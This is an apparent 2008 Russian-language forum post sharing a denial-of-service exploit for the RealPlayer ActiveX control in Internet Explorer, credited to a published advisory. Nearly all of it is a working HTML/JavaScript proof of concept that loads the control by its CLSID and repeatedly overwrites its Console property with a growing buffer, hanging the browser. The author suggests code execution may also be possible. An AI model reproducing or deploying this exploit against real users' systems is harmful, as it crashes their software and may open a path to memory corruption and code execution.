| Евгений Минаев |
12.03.2008 21:12 |
RealPlayer ActiveX Remote Denial of Service Exploit
При запуске скрипта Интернет Эксплорер просто виснет и в последствие убивается через менеджер задач. Скорей всего возможно исполнение кода, по крайней мере автор не пробовал. Написано по эдвайсори Элазара Брода, техническое описание бага взято в чьем-то блоге.
PHP код:
<html>
<head>
<object classid='clsid:{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}' id='player'></object>
</head>
<body>
<script type="text/javascript">
if (player.GetMute() == false){
var buffer = "\x0a";
var tempel = 0;
while (buffer.length < 200) buffer += "\x0a";
for (temp = 0; temp < 15;temp++){
tempel = player.Console;
player.Console = buffer+tempel;
}
} else {
alert('No RealPlayer Found');
}
</script>
</body>
</html>
|
